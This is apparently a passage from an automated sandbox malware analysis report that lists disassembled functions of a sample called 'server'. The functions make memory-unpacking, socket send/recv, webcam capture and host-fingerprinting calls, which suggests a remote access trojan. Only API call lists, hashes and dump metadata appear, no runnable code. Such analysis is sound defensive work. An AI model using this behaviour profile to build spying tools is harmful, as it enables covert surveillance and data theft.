                                • GetCommandLineA.KERNEL32 ref: 00401AAD
                                • GetStartupInfoA.KERNEL32(?), ref: 00401AD8
                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401AFB
                                  • Part of subcall function 00401B54: ExitProcess.KERNEL32 ref: 00401B71
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                • String ID:
                                • API String ID: 2057626494-0
                                • Opcode ID: dc65ff5252418ed06f7e2aeaecfc8b6d2eb23304b692f99c21b4a53cfaee9d22
                                • Instruction ID: b213e8132dc8efbe91fcc638b7e301980758df8d45bd4a2f5fe3e08e305f8fc9
                                • Opcode Fuzzy Hash: dc65ff5252418ed06f7e2aeaecfc8b6d2eb23304b692f99c21b4a53cfaee9d22
                                • Instruction Fuzzy Hash: C3219CB0A40615AEDB18EFA6DD49A6E7BB8EF04704F10403FF902B72E1DB788501CB58
                                Function 100035A0 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON
                                Download Yara Rule
                                APIs
                                • ceil.MSVCRT ref: 100035DC
                                • _ftol.MSVCRT ref: 100035E5
                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,?,?,?,?,?,?,?,?,?,00000118), ref: 100035F9
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual_ftolceil
                                • String ID:
                                • API String ID: 3317677364-0
                                • Opcode ID: b9b9c7f959cafb60f8c472a1f707b4b1b0d8421ec6f82b85174b074a243b1b02
                                • Instruction ID: 0b1270368d2d45482b5d2b14c9809ff80a02e72387afd42c370cd588329eedd8
                                • Opcode Fuzzy Hash: b9b9c7f959cafb60f8c472a1f707b4b1b0d8421ec6f82b85174b074a243b1b02
                                • Instruction Fuzzy Hash: 8E11D2756043049BE704DF28AC8571BBBE5EBC4762F00C43EFD498B395EA76D808CA65
                                Function 10003670 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: _ftolceil
                                • String ID:
                                • API String ID: 2006273141-0
                                • Opcode ID: df6a29d0820029fa79311222890b0ba528136a89e509867819a9108e4dc1c471
                                • Instruction ID: f036b2167112de69efae3a2f3866b39feb2a68a965f290d79b5dff6310f46f10
                                • Opcode Fuzzy Hash: df6a29d0820029fa79311222890b0ba528136a89e509867819a9108e4dc1c471
                                • Instruction Fuzzy Hash: 7411B4717043049FE700EF24EC8562BBBD5EB84752F00C83EFD458B385EA769818CA65
                                Function 100126A0 Relevance: 6.0, APIs: 4, Instructions: 39synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000002,00000001,00000006,?,?,?,?,?,10002644,?), ref: 100126C4
                                • _beginthreadex.MSVCRT ref: 100126EC
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100126FE
                                • CloseHandle.KERNEL32(?), ref: 10012709
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                                • String ID:
                                • API String ID: 92035984-0
                                • Opcode ID: a791306defce20405aa908a4db8f274af4d7f10402202b8947f2bc827508db97
                                • Instruction ID: 23e376a9647dfb6a5603cf557fd056fd51601b5aa0499376741d0f3cabce9402
                                • Opcode Fuzzy Hash: a791306defce20405aa908a4db8f274af4d7f10402202b8947f2bc827508db97
                                • Instruction Fuzzy Hash: 0501DA74608351AFD300DF18CC95F2BBBE5BB88714F544A0CF598A7390D674DA048B92
                                Function 100027C0 Relevance: 6.0, APIs: 4, Instructions: 17threadwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetInputState.USER32 ref: 100027C3
                                • GetCurrentThreadId.KERNEL32 ref: 100027CF
                                • PostThreadMessageA.USER32(00000000), ref: 100027D6
                                • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100027E7
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageThread$CurrentInputPostState
                                • String ID:
                                • API String ID: 2517755969-0
                                • Opcode ID: 467fd943cdf485c2228c8ab07c2f3d1e6c889fb3db9b5598c51c2eda3ead2745
                                • Instruction ID: ec20eca8a2726810b7ac3bdd9eb78ebb057f1ba0a7407110d6dd7586cdd0874f
                                • Opcode Fuzzy Hash: 467fd943cdf485c2228c8ab07c2f3d1e6c889fb3db9b5598c51c2eda3ead2745
                                • Instruction Fuzzy Hash: 47D09E76680360B7F7106BA48C4EF4A3A29AB14B02F904414F705DA2E1E6F456548B66
                                Function 100FA599 Relevance: 4.7, APIs: 3, Instructions: 206memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 100FA617
                                • VirtualProtect.KERNEL32(?,?,-0000002C,-00000524,?,-0000002C,00000000,-00000524), ref: 100FA786
                                Memory Dump Source
                                • Source File: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$FreeProtect
                                • String ID:
                                • API String ID: 2581862158-0
                                • Opcode ID: 0d4901908797a334fb655ef77a27580c9664ec9e80afb356d6c38425ab25cfc6
                                • Instruction ID: 6f2f89bf7d1db90bc62700e0d4ef9e05fe8b12a546338cedc59c46f9f7a7bead
                                • Opcode Fuzzy Hash: 0d4901908797a334fb655ef77a27580c9664ec9e80afb356d6c38425ab25cfc6
                                • Instruction Fuzzy Hash: 356108B6A042199FDB21CA14CC80BA9B7F1EF86350F2944A8D585DB380D771ACC2EB50
                                Function 10003FB0 Relevance: 4.6, APIs: 3, Instructions: 63networksleepCOMMON
                                Download Yara Rule
                                APIs
                                • send.WS2_32(?,00000005,?,00000000), ref: 10003FE1
                                • Sleep.KERNEL32(0000000A), ref: 1000400E
                                • send.WS2_32(?,00000005,00000000,00000000), ref: 1000402B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: send$Sleep
                                • String ID:
                                • API String ID: 3329562092-0
                                • Opcode ID: 96077dc66876e708ef1fcc9b6368c56c91208f17216d08347fa5526f0ee46f43
                                • Instruction ID: 77b5075c0e0706e6fe537e8dad593779b6e714eb1a19249b102693e1965d96d3
                                • Opcode Fuzzy Hash: 96077dc66876e708ef1fcc9b6368c56c91208f17216d08347fa5526f0ee46f43
                                • Instruction Fuzzy Hash: 28110072A053129BE310CE558C84B0BB7E9EB84B91F01042DF259A7281CAB0DC498B92
                                Function 00401220 Relevance: 3.1, APIs: 2, Instructions: 72memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNEL32(?,?,00004000,00000000,00025AE0,00000000,00000000,?,00401104,00000000,?,00000000,0040171B,?), ref: 0040126F
                                • VirtualProtect.KERNEL32(?,?,?,00000000,00000000,00025AE0,00000000,00000000,?,00401104,00000000,?,00000000,0040171B,?), ref: 004012B9
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: Virtual$FreeProtect
                                • String ID:
                                • API String ID: 2581862158-0
                                • Opcode ID: f801a129de5809b732e664a6cc53c47325ccf0b078c9723bd4da4c6216af6513
                                • Instruction ID: cfbe6bb36115d2e176d5e1e333ca34e8b356980680857497402e3289145d6506
                                • Opcode Fuzzy Hash: f801a129de5809b732e664a6cc53c47325ccf0b078c9723bd4da4c6216af6513
                                • Instruction Fuzzy Hash: E421D871A002028BD718DF44D994E7BB3AAFB84704B4542ADE902FB3A5D734FC51C7A4
                                Function 10003A70 Relevance: 3.1, APIs: 2, Instructions: 68networkCOMMON
                                Download Yara Rule
                                APIs
                                • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003ACE
                                • recv.WS2_32(?,?,00002000,00000000), ref: 10003B02
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: recvselect
                                • String ID:
                                • API String ID: 741273618-0
                                • Opcode ID: 19576c416ae504b1cccc257a0332ddcb8846f1a110b95e4235e961779e10f328
                                • Instruction ID: 77f38b4f01034acc4ef75d27983cb47ae4e02c498766849425d2027918183be4
                                • Opcode Fuzzy Hash: 19576c416ae504b1cccc257a0332ddcb8846f1a110b95e4235e961779e10f328
                                • Instruction Fuzzy Hash: D11103323443446BE710CA68DC95BDB73D9EF853A4F004A39BB598B1D2DB74A90983A2
                                Function 100FA53B Relevance: 3.0, APIs: 2, Instructions: 36memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,100FA084,EntryPoint), ref: 100FA580
                                • ExitProcess.KERNEL32(00000000), ref: 100FA8FB
                                Memory Dump Source
                                • Source File: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocExitProcessVirtual
                                • String ID:
                                • API String ID: 3766876677-0
                                • Opcode ID: 29cb7059c9fc364e7bf2e3c86ffc917cdf4fabc8ff533185fd67f21a229e1547
                                • Instruction ID: 4fe5e7ace49094330533e09a95d20d8f760df63a6f60646aa6e15ecdf47a5985
                                • Opcode Fuzzy Hash: 29cb7059c9fc364e7bf2e3c86ffc917cdf4fabc8ff533185fd67f21a229e1547
                                • Instruction Fuzzy Hash: E6F068B4A403199FDB628F15CD04BDA76F4EF46751F1040E5E20AAA1C1C6749DC5CF24
                                Function 00402F1C Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                Download Yara Rule
                                APIs
                                • HeapCreate.KERNEL32(00000000,00001000,00000000,00401A98,00000000), ref: 00402F2D
                                  • Part of subcall function 00402DD4: GetVersionExA.KERNEL32 ref: 00402DF3
                                • HeapDestroy.KERNEL32 ref: 00402F6C
                                  • Part of subcall function 00401B78: HeapAlloc.KERNEL32(00000000,00000140,00402F55,000003F8), ref: 00401B85
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: Heap$AllocCreateDestroyVersion
                                • String ID:
                                • API String ID: 2507506473-0
                                • Opcode ID: 1ae676ff0c69a4e6bd76d125cd19fc1d98bddf8f6eca4611174da9189c4adda8
                                • Instruction ID: 7f902ff39227f710822e6fdadf78228f4e262f85bb6e0f50fc68827d9ffdcbf0
                                • Opcode Fuzzy Hash: 1ae676ff0c69a4e6bd76d125cd19fc1d98bddf8f6eca4611174da9189c4adda8
                                • Instruction Fuzzy Hash: 98F03030684302A9DB206B315E0DB2636B49B14786F90443BF901E91E0EAF88586A619
                                Function 01EA05AA Relevance: 2.6, APIs: 2, Instructions: 76memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 01EA0626
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 01EA0659
                                Memory Dump Source
                                • Source File: 00000003.00000003.1381307083.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_3_1ea0000_server.jbxd
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                • Instruction ID: e80788f380eec0bc93a3d02c992372eefb8358d5c776cfcd6d11dad096175197
                                • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                • Instruction Fuzzy Hash: 17212B35A00219BFDB108F64CC40BEFFFF5EB58398FA08162FA50A6280E7709A119B50
                                Function 00401150 Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,00000000,00025AE0,00000000,00000000,00407050,004010DB,00407050,00025AE0,00000000,?,00000000), ref: 0040119C
                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,00025AE0,00000000,00000000,00407050,004010DB,00407050,00025AE0,00000000,?,00000000), ref: 004011CB
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: a2a3c457274da8820965d6bbbe8d61300a5dc59c40c1fe27a0868a67a8417ca4
                                • Instruction ID: 1c7d8852802480053448be35edf0ca85dfca700aa98abf57b225bd8b4d40fa7f
                                • Opcode Fuzzy Hash: a2a3c457274da8820965d6bbbe8d61300a5dc59c40c1fe27a0868a67a8417ca4
                                • Instruction Fuzzy Hash: 15219571A442018FCB18CF14D894B2BBBE2FB88354F1585ADEA46DB390CB74DC85CBA0
                                Function 100012A0 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                • 6E9B1E00.AVICAP32(00000000,?,00000064,?,00000032,?), ref: 100012BE
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1222aa73b46b66728d6cd3aadffbea8403bbc66a217cf400f6dc0928efd9cc83
                                • Instruction ID: 8c5e13ae8a6d2d630b5cdf0ea91dc5de868f8d74ac694966006bdb18839bb920
                                • Opcode Fuzzy Hash: 1222aa73b46b66728d6cd3aadffbea8403bbc66a217cf400f6dc0928efd9cc83
                                • Instruction Fuzzy Hash: 29D02B3190022026F650D520AD02FDF73DC9F53B80F814138BE40D6082E9184B2E43E2
                                Function 10015E40 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: calloc
                                • String ID:
                                • API String ID: 2635317215-0
                                • Opcode ID: 8e9727687917e279abf897c07722a1903250bb2e9caaf9f2d8482a537b497e5c
                                • Instruction ID: 6dbe3aecfb57257a18ed92bf778f98b40f4d5830df8d968e854abdc2cc444f5c
                                • Opcode Fuzzy Hash: 8e9727687917e279abf897c07722a1903250bb2e9caaf9f2d8482a537b497e5c
                                • Instruction Fuzzy Hash: D3B012FD5042007FC908D794DC42CABB39DEFC4200F80880CBC4842201D935E804C632

                                Non-executed Functions

                                Function 1000AA30 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 444registrystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 1000A950: GetVersionExA.KERNEL32 ref: 1000A964
                                  • Part of subcall function 1000A950: wsprintfA.USER32 ref: 1000A97D
                                • wsprintfA.USER32 ref: 1000AA75
                                • RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00000001,?), ref: 1000AA8E
                                • RegQueryValueExA.ADVAPI32 ref: 1000AAB2
                                • RegCloseKey.ADVAPI32(00000000), ref: 1000AABD
                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,00000000), ref: 1000AB02
                                • RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,?,?,?), ref: 1000AB31
                                • RegCloseKey.ADVAPI32(00000000), ref: 1000AB3C
                                • wsprintfA.USER32 ref: 1000AB57
                                • GetTickCount.KERNEL32 ref: 1000AB5C
                                • wsprintfA.USER32 ref: 1000ABAC
                                • GetComputerNameA.KERNEL32(?,?), ref: 1000ABC6
                                • GetUserNameA.ADVAPI32(?,00000080), ref: 1000ABD9
                                • wsprintfA.USER32 ref: 1000ABF4
                                • GetLogicalDriveStringsA.KERNEL32(00000100,?), ref: 1000AC21
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000AC7E
                                • SHGetFileInfo.SHELL32(?,00000080,?,00000160,00000410), ref: 1000AC9C
                                • lstrlen.KERNEL32(?,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000ACAA
                                • lstrlen.KERNEL32(?,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000ACB4
                                • GetDiskFreeSpaceExA.KERNEL32(?,?,?,00000000,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000ACCD
                                • lstrlen.KERNEL32(?,?,?,?,~MHz,00000000,00000000,?,?), ref: 1000AD0A
                                • wsprintfA.USER32 ref: 1000AD2B
                                • wsprintfA.USER32 ref: 1000AD3F
                                • GlobalMemoryStatusEx.KERNEL32 ref: 1000AD90
                                • wsprintfA.USER32 ref: 1000ADB9
                                • GlobalMemoryStatusEx.KERNEL32 ref: 1000ADD8
                                • wsprintfA.USER32 ref: 1000AE01
                                • wsprintfA.USER32 ref: 1000AE79
                                • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 1000AE88
                                • wsprintfA.USER32 ref: 1000AEBE
                                • _strrev.MSVCRT ref: 1000AF02
                                • _strrev.MSVCRT ref: 1000AF1A
                                • _strrev.MSVCRT ref: 1000AF58
                                • wsprintfA.USER32 ref: 1000AFEC
                                • wsprintfA.USER32 ref: 1000AFFE
                                  • Part of subcall function 10012620: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
                                  • Part of subcall function 10012620: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
                                  • Part of subcall function 10012620: Process32First.KERNEL32(00000000,00000000), ref: 10012646
                                  • Part of subcall function 10012620: _strcmpi.MSVCRT ref: 10012658
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
